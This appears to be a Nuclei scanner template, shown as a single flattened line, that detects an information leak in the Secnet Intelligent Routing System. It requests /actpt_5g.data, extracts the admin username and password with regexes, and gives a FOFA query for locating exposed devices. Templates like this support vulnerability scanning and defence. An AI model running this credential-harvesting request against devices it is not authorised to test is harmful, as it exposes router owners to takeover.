id: secnet-info-leak info: name: Secnet Intelligent Routing System actpt_5g.data - Information Leak author: DhiyaneshDk severity: high description: Secnet Intelligent Routing System is exposed. reference: - https://mp.weixin.qq.com/s/lNlI5ZtUJG50ipS0WfytUw - https://github.com/gobysec/GobyVuls/blob/master/secnet_Intelligent_Router_actpt_5g.data_Infoleakage.md metadata: verified: true max-request: 1 fofa-query: title="安网-智能路由系统" || header="HTTPD_ac 1.0" tags: info-leak,secnet,misconfig http: - method: GET path: - "{{BaseURL}}/actpt_5g.data" matchers-condition: and matchers: - type: word part: body words: - '"http_username":' - '"http_passwd":' condition: and - type: status status: - 200 extractors: - type: regex part: body group: 1 regex: - '"http_username":"([a-z]+)"' - '"http_passwd":"([a-z]+)"' # digest: 490a0046304402202d0450ced5380addb93ef666e9401ce1027c3ba4be04ebd6ce18007dc58444370220747fc616b579a1a947ce2b89a6d0505f4ada4c94c4c606f3f9d578d299022c20:922c64590222798bb761d5b6d8e72950